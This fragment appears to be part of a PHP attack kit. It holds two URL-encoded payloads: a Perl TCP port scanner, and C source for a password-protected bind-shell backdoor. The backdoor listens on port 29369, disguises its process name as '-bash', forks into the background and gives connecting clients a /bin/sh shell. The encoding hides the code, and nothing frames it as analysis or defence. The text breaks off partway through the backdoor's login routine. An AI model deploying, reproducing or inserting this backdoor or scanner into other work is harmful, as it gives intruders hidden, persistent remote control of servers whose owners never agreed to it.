$pl_scan = "%23!%2Fusr%2Fbin%2Fperl%0Ause%20warnings%3B%0Ause%20strict%3B%0Ause%20diagnostics%3B%0Ause%20IO%3A%3ASocket%3A%3AINET%3B%0Asub%20usage%0A%7B%0A%09die(%22%240%20host%20startport%20endport%0A%22)%3B%0A%7D%0Ausage%20unless(%40ARGV%3E1)%3B%0Amy(%24host%2C%24s%2C%24e)%3D%40ARGV%3B%0Aforeach(%24s..%24e)%20%7B%0A%09my%20%24sock%3DIO%3A%3ASocket%3A%3AINET-%3Enew%0A%09(%0A%09%09PeerAddr%3D%3E%24host%2C%0A%09%09PeerPort%3D%3E%24_%2C%0A%09%09Proto%3D%3E'tcp'%2C%0A%09%09Timeout%3D%3E2%0A%09)%3B%0A%09print%20%22Port%20%20open%0A%22%20if%20(%24%5Csock)%3B%0A%7D%0A%0A%09";
$rk_ovas = "%23include+%3cstdio.h%3e%0d%0a%23include+%3cstdlib.h%3e%0d%0a%23include+%3cerrno.h%3e%0d%0a%23include+%3cstrings.h%3e%0d%0a%23include+%3cnetinet%2fin.h%3e%0d%0a%23include+%3csys%2fsocket.h%3e%0d%0a%23include+%3csys%2ftypes.h%3e%0d%0a%23include+%3csignal.h%3e%0d%0a%23define+PASSAUTH+1+%0d%0a%0d%0a%23define+PORT++++++++++++29369%0d%0a%23define+MSG_WELCOME+++++%22r00t'd%5cn+All+commands+are+followed+by+a+%3b%5cn%22%0d%0a%23define+MSG_PASSWORD++++%22Password%3a+%22%0d%0a%23define+MSG_WRONGPASS+++%22Invalid+password%5cn%22%0d%0a%23define+MSG_OK++++++++++%22Welcome...%5cn%22%0d%0a%23define+MSG_CONTINUE++++%22Do+you+want+to+continue%3f%5cn%22%0d%0a%0d%0a%23define+HIDE++++++++++++%22-bash%22%0d%0a%23define+SHELL+++++++++++%22%2fbin%2fsh%22%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0a++++++++%23define+PASSWD+%22__RAHTPASS__%22%0d%0a%23endif%0d%0a%0d%0aint+main+(int+argc%2c+char+*argv%5b%5d)%3b%0d%0a%23ifdef+PASSAUTH%0d%0aint+login+(int)%3b%0d%0a%23endif%0d%0a%0d%0aint+background()%0d%0a%7b%0d%0aint+pid%3b%0d%0asignal(SIGCHLD%2cSIG_IGN)%3b%0d%0apid+%3d+fork()%3b%0d%0aif(pid%3e0)%0d%0a%7b%0d%0asleep(1)%3b%0d%0aexit(EXIT_SUCCESS)%3b+%0d%0a%7d%0d%0aif(pid%3d%3d0)%0d%0a%7b%0d%0asignal(SIGCHLD%2cSIG_DFL)%3b%0d%0areturn+getpid()%3b%0d%0a%7d%0d%0areturn+-1%3b%0d%0a%7d%0d%0a%0d%0aint%0d%0amain+(int+argc%2c+char+*argv%5b%5d)%0d%0a%7b%0d%0a++++++++int+sockfd%2c+newfd%2c+size%3b%0d%0a++++++++struct+sockaddr_in+local%3b%0d%0a++++++++struct+sockaddr_in+remote%3b%0d%0a++++++++char+cmd%5b256%5d%3b%0d%0a%0d%0a++++++++strcpy+(argv%5b0%5d%2c+HIDE)%3b%0d%0a++++++++signal+(SIGCHLD%2c+SIG_IGN)%3b%0d%0a%0d%0a++++++++bzero+(%26local%2c+sizeof(local))%3b%0d%0a++++++++local.sin_family+%3d+AF_INET%3b%0d%0a++++++++local.sin_port+%3d+htons+(PORT)%3b%0d%0a++++++++local.sin_addr.s_addr+%3d+INADDR_ANY%3b%0d%0a++++++++bzero+(%26(local.sin_zero)%2c+8)%3b%0d%0a%0d%0a++++++++if+((sockfd+%3d+socket(AF_INET%2c+SOCK_STREAM%2c+0))+%3d%3d+-1)+%7b%0d%0a++++++++++++++++perror(%22socket%22)%3b%0d%0a++++++++++++++++e
xit(1)%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(bind+(sockfd%2c+(struct+sockaddr+*)%26local%2c+sizeof(struct+sockaddr))+%3d%3d%0d%0a-1)+%7b%0d%0a++++++++++++++++perror(%22bind%22)%3b%0d%0a++++++++++++++++exit(1)%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(listen(sockfd%2c+5)+%3d%3d+-1)+%7b%0d%0a++++++++++++++++perror(%22listen%22)%3b%0d%0a++++++++++++++++exit(1)%3b%0d%0a++++++++%7d%0d%0a++++++++size+%3d+sizeof(struct+sockaddr_in)%3b%0d%0a++++++++background()%3b%0d%0a++++++++while+(1)+%7b%0d%0a++++++++++++++++if+((newfd+%3d+accept+(sockfd%2c+(struct+sockaddr+*)%26remote%2c+%26size))%0d%0a%3d%3d+-1)+%7b%0d%0a++++++++++++++++++++++++perror+(%22accept%22)%3b%0d%0a++++++++++++++++++++++++exit(1)%3b%0d%0a++++++++++++++++%7d%0d%0a%0d%0a++++++++++++++++if+(!fork+())+%7b%0d%0a++++++++++++++++++++++++send+(newfd%2c+MSG_WELCOME%2c+sizeof(MSG_WELCOME)%2c+0)%3b%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0a++++++++++++++++++++++++if+(login(newfd)+!%3d+1)+%7b%0d%0a++++++++++++++++++++++++++++++++send+(newfd%2c+MSG_WRONGPASS%2c%0d%0asizeof(MSG_WRONGPASS)%2c+0)%3b%0d%0a++++++++++++++++++++++++++++++++close+(newfd)%3b%0d%0a++++++++++++++++++++++++++++++++exit(1)%3b%0d%0a++++++++++++++++++++++++%7d%0d%0a%23endif%0d%0a%0d%0a++++++++++++++++++++++++close+(0)%3b+close(1)%3b+close(2)%3b%0d%0a++++++++++++++++++++++++dup2+(newfd%2c+0)%3b+dup2(newfd%2c+1)%3b+dup2(newfd%2c+2)%3b%0d%0a++++++++++++++++++++++++execl+(SHELL%2c+SHELL%2c+(char+*)0)%3b+close(newfd)%3b%0d%0aexit(0)%3b%0d%0a++++++++++++++++%7d%0d%0a++++++++++++++++close+(newfd)%3b%0d%0a++++++++%7d%0d%0a++++++++return+0%3b%0d%0a%7d%0d%0a%0d%0a%23ifdef+PASSAUTH%0d%0aint%0d%0alogin+(int+fd)%0d%0a%7b%0d%0a++++++++char+u_passwd%5b15%5d%3b%0d%0a++++++++int+i%3b%0d%0a%0d%0a++++++++send+(fd%2c+MSG_PASSWORD%2c+sizeof(MSG_PASSWORD)%2c+0)%3b%0d%0a++++++++recv+(fd%2c+u_passwd%2c+sizeof(u_passwd)%2c+0)%3b%0d%0a%0d%0a++++++++for+(i+%3d+0%3b+i+%3c+strlen+(u_passwd)%3b+i%2b%2b)+%7b%0d%0a++++++++++++++++if+(u_passwd%5bi%5d+%3d%3d+'%5cn'+%7c%7c+u_passwd%5bi%5d+%
3d%3d+'%5cr')%0d%0a++++++++++++++++u_passwd%5bi%5d+%3d+'%5c0'%3b%0d%0a++++++++%7d%0d%0a%0d%0a++++++++if+(strcmp+(PASSWD%2c+u_passwd)+%3d%3d+0)+%7
